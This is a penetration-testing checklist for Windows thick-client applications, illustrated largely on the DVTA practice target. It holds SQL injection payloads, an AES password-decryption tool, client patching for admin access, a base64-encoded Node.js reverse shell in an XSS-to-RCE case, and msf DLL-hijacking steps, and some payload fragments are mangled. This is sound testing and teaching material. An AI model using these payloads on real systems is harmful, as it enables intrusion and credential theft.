
Title: Penetration Test PC Client (C-S Architecture) Checklist


0x00 Introduction

This checklist targets penetration testing of PC clients (C-S architecture) and combines our own testing experience with material collected from the web. If you have any questions, please contact us; contributions of further techniques and cases are welcome.

0x01 Overview

PC client: a GUI application with rich functionality, built on a C-S (client-server) architecture.


0x02 Development Language

C# (.NET), Java, Delphi, C, C++.

0x03 Protocol

TCP, HTTP(S), TDS.

0x04 Database

Oracle, MSSQL, DB2.

0x05 Test Tool

//Related tools download: https://github.com/theLSA/hack-cs-tools

dvta: PC client practice target (Damn Vulnerable Thick Client Application)

ida pro: Static analysis tool

ollydbg: Dynamic Analysis Tool

CFF Explorer: PE file analysis

PEiD: packer detection tool

exeinfope/studype: PE file analysis

wireshark: Observe traffic

tcpview: observe TCP connections

Echo Mirage: can intercept and edit TCP traffic

burpsuite: HTTP(S) packet capture

proxifier: global traffic proxying

procmon: file and registry monitoring

regshot: registry changes comparison

Process Hacker: process analysis (including memory inspection)

RegFromApp: registry monitoring

WSExplorer: per-process packet capture tool

strings: view the strings contained in the program

.NET decompilation:

dotpeek

de4dot

dnspy

ilspy

sae

ildasm

ilasm

Java decompilation:

jad

jd-gui

jadx

dex2jar

Online decompilers:

javare.cn

www.javadecompilers.com

Reflexil: Assembly editor (can be used as an ilspy plugin)

VCG (VisualCodeGrepper): automated code auditing tool

BinScope: Microsoft binary security analysis tool

0x06 Proxy Settings

Most clients have no proxy configuration of their own, so a global proxy has to be set up by the tester, as follows:

1) IE - Internet Options - Connections - LAN settings.

2) Proxifier - Proxy Servers / Proxification Rules.

//HTTP traffic can be handed to Burp Suite for convenient testing (set the proxy server to Burp's listener address).


0x07 Test Points

0. Information Collection

Compiler/build information, development environment and language, protocol used, database, IP addresses, obfuscation/encryption, whether the binary is packed, etc.

Case 0 - Use CFF Explorer to view client information (such as the compilation environment)

dvta


1. Reverse Engineering

Decompilation, source code leakage, hardcoded keys/passwords, encryption and decryption logic, role determination logic (0-admin, 1-normaluser), backdoors, etc.

Case 0 - Decompile to obtain the encryption/decryption logic and write a decryption tool

dvta

Information obtained from this logic:

Encrypted text: CTsvjZ0jQghXYWbSRcPxpQ==

AES key: J8gLXc454o5tW2HEF7HahcXPufj9v8k8

IV: fq20T0gMnXa6g0l4

Write a decryption tool:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Security.Cryptography;

namespace aesdecrypt
{
    public partial class aesdecrypt : Form
    {
        public aesdecrypt()
        {
            InitializeComponent();
        }

        // Button handler: decrypts the stored database password with the
        // AES key and IV that were hardcoded in the decompiled client.
        private void decrypt(object sender, EventArgs e)
        {
            String key = "J8gLXc454o5tW2HEF7HahcXPufj9v8k8";   // 32 ASCII bytes = 256-bit key
            String IV = "fq20T0gMnXa6g0l4";                    // 16 ASCII bytes = one AES block
            String encryptedtext = "CTsvjZ0jQghXYWbSRcPxpQ==";
            byte[] encryptedBytes = Convert.FromBase64String(encryptedtext);

            // Same parameters as the client: AES-256, CBC mode, PKCS7 padding
            AesCryptoServiceProvider aes = new AesCryptoServiceProvider();
            aes.BlockSize = 128;
            aes.KeySize = 256;
            aes.Key = System.Text.ASCIIEncoding.ASCII.GetBytes(key);
            aes.IV = System.Text.ASCIIEncoding.ASCII.GetBytes(IV);
            aes.Padding = PaddingMode.PKCS7;
            aes.Mode = CipherMode.CBC;

            ICryptoTransform crypto = aes.CreateDecryptor(aes.Key, aes.IV);
            byte[] decryptedbytes = crypto.TransformFinalBlock(encryptedBytes, 0, encryptedBytes.Length);
            String decryptedString = System.Text.ASCIIEncoding.ASCII.GetString(decryptedbytes);

            Console.WriteLine("\n");
            Console.WriteLine("################Decrypt Database password############\n");
            Console.WriteLine("Decrypted Database password:" + decryptedString + "\n");
            Console.WriteLine("################Done###############\n");
        }
    }
}

//The decryption code originated from https://resources.infosecinstitute.com/damn-vulnerable-thick-client-app-part-5/#article

Case 1 - Decompile and modify the code logic so that an ordinary user logs in as administrator

dvta

1 - isAdmin

0 - normal user

Change the 1 in the admin check to 0 so that a normal user is treated as admin.


2. Information leakage

Sensitive information in plain text, sensitive files (such as xxx.config in the installation directory).

Registry: use regshot to compare the registry before and after a client action (such as login).

Development and debug log leaks (such as dvta.exe's log.txt).

Use Process Hacker to view plaintext sensitive data (such as account passwords/keys) in the client's memory.

Use strings to view the client's strings directly (such as IP information).

Look for published source code (such as on GitHub, Gitee, etc.).

Case 0 - Sensitive information leaked in a configuration file

dvta


Case 1 - Database account password leaked in memory

dvta


Case 2 - The source code contains a hardcoded FTP account password

dvta

Case 3 - Development and debugging log leak

dvta


Case 4 - A certain system saves the account password locally after login

//This case comes from https://blog.csdn.net/weixin_30685047/article/details/95916065

3. Network traffic

Tools: Wireshark / Echo Mirage / Burp Suite + NoPE Proxy / Fiddler / Charles

Account passwords transmitted in plain text by protocols such as FTP.

SQL statements transmitted in plain text (which allows constructing injections, exceeding privileges, etc.).

Case 0 - Zhengfang Academic Affairs System transmits SQL statements in plain text and returns data in plain text


//This case comes from WooYun

Case 1 - The login response packet of a certain system returns the database account password


4. Other vulnerabilities

Username enumeration

Case 0


Brute force

For example, against the login function.

Case 0


Weak password

Try combinations such as admin / 123456, etc.

Personal information transmitted in plain text

SQL statements exposed

Case 0

Case 1

SQL Injection

For a login form, try a universal password:

xxx' or 'x'='x

xxx' or 1=1--

In input boxes, try to close the quoting and provoke an error, e.g. ', '), %'), order by 100---, etc.

Data is extracted through displayed columns or error messages. The principle is the same as web injection, and the different databases behave similarly.

Case 0 - Oracle injection

' union select null,null,(select user from dual),null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual--

Case 1 - MSSQL injection

111') and (select user)0--

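As an added example (not code from the original post or from DVTA) covering the universal-password injection above and the client-side role flag from Case 1 of section 1: a login handler in Python over an in-memory sqlite3 table (constructed; the real backends are MSSQL/Oracle) showing the concatenated query the universal password bypasses, the parameterised fix, and the admin role looked up server-side instead of trusted from the client.

```python
import sqlite3

# Constructed in-memory user table standing in for the client's backend
# database (sqlite3 is used only so that the example runs offline).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, isadmin INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("admin", "S3cretAdminPw", 1), ("bob", "bobpw", 0)])
    return db

def login_vulnerable(db, username, password):
    # Query built by string concatenation: the quote in the universal
    # password closes the string literal and the OR clause makes the WHERE
    # condition true for every row, so the first user (admin) is returned.
    sql = ("SELECT username, isadmin FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    return db.execute(sql).fetchone()

def login_fixed(db, username, password):
    # Parameterised query: the input is bound as data and never parsed as SQL,
    # so the same universal password simply fails to match any row.
    sql = "SELECT username, isadmin FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()

def is_admin_server_side(db, username):
    # Authorisation decided from the server's own record of the user, not
    # from an isadmin flag the client reports: a patched client binary can
    # claim admin, but it cannot change this row.
    row = db.execute("SELECT isadmin FROM users WHERE username=?",
                     (username,)).fetchone()
    return row is not None and row[0] == 1

if __name__ == "__main__":
    db = make_db()
    for pw in ("xxx' or 'x'='x", "xxx' or 1=1--"):
        print("vulnerable:", login_vulnerable(db, "anything", pw),
              "fixed:", login_fixed(db, "anything", pw))
    print("bob is admin:", is_admin_server_side(db, "bob"))
```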

CSV injection

If the client exports to Excel, enter 1+1 in a field and check whether it shows as 2 after export.

XSS

Applies to clients built on Electron, NodeWebKit, etc.

Case 0 - AntSword (China Ant Sword) XSS to RCE

Environment: Win7 + phpstudy (php5.6.27-nts) + perl + nc + AntSword 2.0.5

xss webshell:

?php

header('HTTP/1.1 500 img src=# onerror=alertx');

windows+node.js:

var net=require('net'), sh=require('child_process').exec('cmd.exe');

var client=new net.Socket();

client.connect(6677, '127.0.0.1', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);

sh.stderr.pipe(client);});

?php

header('HTTP/1.1 500 Not img src=# onerror='eval(new Buffer(dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVj dCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=,base64).toString())'');

Related reference

https://www.anquanke.com/post/id/176379

Command execution

Case 0 - Evernote Windows Client 6.15 local file read and remote command execution http://blog.knownsec.com/2018/11/%E5%8D%B0%E8%B1%A1%E7%AC%94%E8%AE%B0-windows-%E5%AE%A2%E6%88%B7%E7%AB%AF-6-15-%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%92%8C%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/

Case 1 - Discovery process of command execution in a certain cloud PC client

https://www.secpulse.com/archives/53852.html

Case 2 - Kingsoft WPS Mail client remote command execution vulnerability (tips for Mozilla-based XUL programs)

https://shuimugan.com/bug/view?bug_no=193117

The test points are the same as for the web.

DLL hijacking

Windows DLL search order (when the program loads a DLL without an absolute path):

1. The directory the application was loaded from.

2. The current directory.

3. The system directory (C:\Windows\System32\).

4. The 16-bit system directory.

5. The Windows directory.

6. The directories in the PATH variable.

If an attacker can write to a directory that is searched before the one holding the real DLL, the program loads the attacker's DLL instead.

Use procmon to list the DLLs the program tries to load and look for results of NAME NOT FOUND.

A malicious DLL generated with msf is placed at the location the program loads from; running the program then triggers the payload.

Case 0 - DLL hijacking

dvta

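As an added illustration of the procmon step above (not from the original post): a script that reads a Process Monitor CSV export and lists the DLLs the client probed for in non-system directories without finding them, which are the directories whose permissions a tester then has to check. The CSV sample is constructed with the column layout of procmon's CSV export; the process name dvta.exe and the paths are made up.

```python
import csv
import io
import ntpath

# Constructed sample of a procmon "Save as CSV" export (made-up paths/PID).
PROCMON_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","dvta.exe","4120","CreateFile","C:\\Program Files\\DVTA\\DWrite.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","dvta.exe","4120","CreateFile","C:\\Windows\\System32\\DWrite.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:02.3","dvta.exe","4120","CreateFile","C:\\Program Files\\DVTA\\version.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.4","dvta.exe","4120","CreateFile","C:\\Users\\alice\\Desktop\\version.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.5","dvta.exe","4120","CreateFile","C:\\Windows\\System32\\version.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:02.6","dvta.exe","4120","CreateFile","C:\\Program Files\\DVTA\\dvta.exe.config","NAME NOT FOUND","Desired Access: Read"
"""

# Probes that miss inside the system/Windows directories are normal; the
# interesting misses are in directories searched earlier (application
# directory, current directory, PATH entries).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\")

def find_dll_candidates(csv_text, process=None):
    """Map each DLL name to the non-system paths where the process looked for
    it and got NAME NOT FOUND, in the order the probes appear in the log."""
    misses = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if process and row["Process Name"].lower() != process.lower():
            continue
        path = row["Path"]
        name = ntpath.basename(path).lower()
        if not name.endswith(".dll") or row["Result"] != "NAME NOT FOUND":
            continue
        if path.lower().startswith(SYSTEM_DIRS):
            continue
        misses.setdefault(name, []).append(path)
    return misses

if __name__ == "__main__":
    for dll, paths in find_dll_candidates(PROCMON_CSV, process="dvta.exe").items():
        print(dll)
        for p in paths:
            print("   probed:", ntpath.dirname(p))
```

A reported directory is only a real hijack candidate if a low-privileged user can write to it, so check its ACL (for example with icacls) before counting it as a finding.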

Business logic flaws

The test points are the same as for the web.

Licensing and authentication flaws

License key values in the registry; forging the information returned by the license server.

Related reference

https://cloud.tencent.com/developer/article/1430899

Unauthorized access

Case 0 - Arbitrary operations on the Zhengfang Academic Affairs System database

The database can be taken over just by knowing its IP address.
